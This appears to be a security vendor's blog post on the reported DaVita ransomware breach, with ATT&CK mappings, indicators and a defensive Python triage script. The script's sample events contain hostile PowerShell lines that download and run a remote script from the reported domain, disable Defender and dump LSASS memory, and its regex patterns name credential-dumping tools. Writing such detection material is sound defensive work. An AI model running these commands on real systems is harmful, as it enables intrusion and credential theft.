On March 24, 2025, DaVita, a large provider of kidney care, reported what seems to have been a significant ransomware attack. Some of the specifics remain unclear, and timelines could shift as more forensic evidence is gathered. Public disclosures so far suggest that nearly 2.7 million patient records may have been exposed. The case highlights once again how healthcare, despite being a top target, struggles to keep pace with attacker tactics.
What We Know About the Breach
According to early findings, attackers infiltrated DaVita’s environment and exfiltrated a significant amount of information — roughly 1.5 TB across about 700,000 files. These numbers may be revised as forensics progresses, but so far investigators believe the affected categories of data included:
- Personal identifiers such as names, addresses, dates of birth, SSNs
- Health records, including insurance data, diagnoses, treatment notes, dialysis results
- Certain financial details like tax IDs and scanned checks
- User account information — possibly including usernames and hashed credentials
Technical Observations and Indicators
The forensic picture is incomplete, but the tactics reported so far map onto well-known MITRE ATT&CK techniques (IDs added here for reference). Analysts stress that the sequence may change as more evidence emerges. Suspected elements include:
- Compromised accounts, likely through phishing or credential reuse (T1566 Phishing, T1078 Valid Accounts)
- Obfuscated PowerShell command execution (T1059.001 PowerShell, T1027 Obfuscated Files or Information)
- Registry Run key modifications for persistence (T1547.001 Registry Run Keys / Startup Folder)
- Attempts to disable security software (T1562.001 Disable or Modify Tools)
- Credential dumping from memory (T1003 OS Credential Dumping; T1003.001 when LSASS is the source)
- Data staged locally (T1074 Data Staged) and moved out over HTTPS on port 443, occasionally port 8080 (T1041 or T1048); exfiltration over 443 blends with normal web traffic, so the volume and the destination, not the port, are what stand out
- File encryption followed by ransom notes (T1486 Data Encrypted for Impact)
Concrete indicators were also noted, though they should be corroborated against primary threat-intelligence sources before being loaded into blocklists. One malicious binary was reported with the hash SHA256: 9f2c7d3a4f1b3e9e6c0d8a1c74a1f3b2d6e8c0ab1234567890deadbeef1234567. As printed, that value is 65 hexadecimal characters, one more than a SHA-256 digest, so it has been mistyped or padded somewhere and will never match a real file until the correct 64-character value is confirmed. Analysts also highlighted encoded PowerShell launches such as ‘powershell.exe -enc JAB…’; the JAB prefix is what a UTF-16LE script beginning with a ‘$’ variable looks like after base64 encoding, and the actual command is only visible once the argument is decoded. Suspicious traffic to domains like ‘secure-update[.]com’ and IP addresses in 185.199.x.x was reported; note that 185.199.108.0/22 inside that range is used by GitHub Pages, so blocking the whole /16 on the strength of this report would disrupt legitimate traffic, and only the specific addresses observed should be matched. The ransom notes appeared as README_DECRYPT.txt files scattered across compromised systems.
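As an added example, not code from the original article or from the DaVita investigation, the Python below shows how a detection engineer would apply the behaviours and indicators listed above to endpoint telemetry: it validates the indicators (the hash quoted above is 65 hexadecimal characters, so it fails the SHA-256 check), decodes ‘-enc’ PowerShell launches from their UTF-16LE base64 form so the real command can be inspected, and flags Run-key persistence, Defender tampering, LSASS dumping, lookups of the reported domain, and ransom-note drops. The event records and their field names are simplified, constructed Sysmon-style samples made up for this example, and the ATT&CK IDs attached to each finding are this example's own mapping.

```python
import base64
import re

# The domain and hash string below are the ones quoted in the text above. The hash
# is kept only to show that it fails validation; the sample events further down are
# constructed for this example and are not records from the DaVita investigation.
PAGE_HASH = "9f2c7d3a4f1b3e9e6c0d8a1c74a1f3b2d6e8c0ab1234567890deadbeef1234567"
PAGE_DOMAIN = "secure-update[.]com"
RANSOM_NOTE = "README_DECRYPT.txt"

SHA256_RE = re.compile(r"^[0-9a-f]{64}$")
# PowerShell accepts -e, -ec and -enc as abbreviations of -EncodedCommand.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})")
RUN_KEY_RE = re.compile(r"(?i)\\CurrentVersion\\Run(?:Once)?\\")
DISABLE_AV_RE = re.compile(r"(?i)Set-MpPreference\s+-Disable|sc(?:\.exe)?\s+stop\s+\S*(?:sense|defend)")
LSASS_DUMP_RE = re.compile(r"(?i)comsvcs\.dll.*minidump|procdump.*lsass|sekurlsa")


def refang(ioc: str) -> str:
    """Turn a defanged indicator ('secure-update[.]com', 'hxxp://') back into matchable form."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


def valid_sha256(digest: str) -> bool:
    """A SHA-256 digest is exactly 64 hex characters; anything else must not be loaded as one."""
    return bool(SHA256_RE.match(digest.strip().lower()))


def decode_encoded_powershell(cmdline: str):
    """Return the plaintext of a -EncodedCommand launch, or None if there is none.

    PowerShell base64-encodes the script as UTF-16LE, so decoding as UTF-8 would give
    text with a NUL byte between every character; the 'JAB' prefix mentioned in the
    text above is simply what a script starting with '$' looks like after that encoding."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(events, ioc_domains=(PAGE_DOMAIN,)):
    """Walk simplified Sysmon-style events and return (seq, technique, detail) findings.

    Event shapes are this example's own assumption, not Sysmon's real schema:
      process  -> {"seq", "type", "cmdline"}
      registry -> {"seq", "type", "target"}
      dns      -> {"seq", "type", "query"}
      file     -> {"seq", "type", "path"}"""
    domains = {refang(d).lower() for d in ioc_domains}
    findings = []
    for ev in events:
        kind = ev["type"]
        if kind == "process":
            cmd = ev["cmdline"]
            decoded = decode_encoded_powershell(cmd)
            if decoded is not None:
                findings.append((ev["seq"], "T1059.001 encoded PowerShell", decoded))
                cmd = decoded  # inspect the real command, not its base64 wrapper
            if DISABLE_AV_RE.search(cmd):
                findings.append((ev["seq"], "T1562.001 disable security tools", cmd))
            if LSASS_DUMP_RE.search(cmd):
                findings.append((ev["seq"], "T1003.001 LSASS memory dump", cmd))
        elif kind == "registry" and RUN_KEY_RE.search(ev["target"]):
            findings.append((ev["seq"], "T1547.001 Run key persistence", ev["target"]))
        elif kind == "dns" and ev["query"].lower() in domains:
            findings.append((ev["seq"], "IOC domain lookup", ev["query"]))
        elif kind == "file" and ev["path"].endswith("\\" + RANSOM_NOTE):
            findings.append((ev["seq"], "T1486 ransom note dropped", ev["path"]))
    return findings


def _enc(script: str) -> str:
    """Encode a script the way 'powershell -enc' expects (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry for the walkthrough (made up, not real DaVita logs).
SAMPLE_EVENTS = [
    {"seq": 1, "type": "process", "cmdline": "svchost.exe -k netsvcs"},
    {"seq": 2, "type": "process",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _enc(
         "IEX (New-Object Net.WebClient).DownloadString('https://secure-update.com/u.ps1')")},
    {"seq": 3, "type": "process",
     "cmdline": "powershell.exe -enc " + _enc("Set-MpPreference -DisableRealtimeMonitoring $true")},
    {"seq": 4, "type": "registry",
     "target": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater"},
    {"seq": 5, "type": "registry",
     "target": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\App"},
    {"seq": 6, "type": "process",
     "cmdline": "rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump 652 C:\\temp\\l.dmp full"},
    {"seq": 7, "type": "dns", "query": "secure-update.com"},
    {"seq": 8, "type": "dns", "query": "login.microsoftonline.com"},
    {"seq": 9, "type": "file", "path": "C:\\Users\\jdoe\\Documents\\README_DECRYPT.txt"},
]

if __name__ == "__main__":
    print("hash on the page is a valid SHA-256:", valid_sha256(PAGE_HASH), "(length", len(PAGE_HASH), ")")
    for seq, technique, detail in triage(SAMPLE_EVENTS):
        print(f"event {seq}: {technique}: {detail}")
```

Run stand-alone it reports the hash as invalid and prints seven findings, two of them for event 3, because the Defender-tampering rule is applied to the decoded command rather than to the opaque base64 argument. That is the point of decoding first: a rule that only looks at the raw command line sees ‘powershell.exe -enc …’ twice and learns nothing about which launch downloads a stager and which one turns off real-time monitoring.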
Early Response and Remediation
Interestingly, some of the first public details were not about the intrusion itself but about DaVita’s remediation steps. In cooperation with external incident response teams, the company has been rolling out a variety of defensive measures while still piecing together exactly what happened. Among the actions reported:
- Emergency patching of servers and endpoints
- Company‑wide enforcement of multi‑factor authentication
- Internal network segmentation to limit lateral spread
- Broader deployment of EDR and monitoring tools
- Restoration from pre‑tested offline backups
- Selective shutdowns of risky systems to contain the incident
Takeaway for CISOs
For CISOs, the DaVita case is a reminder that ransomware operations rarely rely on cutting‑edge exploits. They succeed because defenders are slower to react. Key reflections include:
- Continuous testing and visibility into exposed systems must become routine
- Prioritize remediation of the most exploitable weaknesses
- Explore automation and AI‑driven red teaming to match attacker speed
- Practice incident response realistically — plans are essential, but improvisation is inevitable
This case is still unfolding, and more details will emerge. What’s already clear is that healthcare organizations remain prime targets, and security teams have little margin for error.
Outpace Attackers With AI-Based Automated Penetration Testing With FireCompass
FireCompass is a single platform for AI-Powered Continuous Automated Red Teaming (CART), Pen Testing and NextGen Attack Surface Management.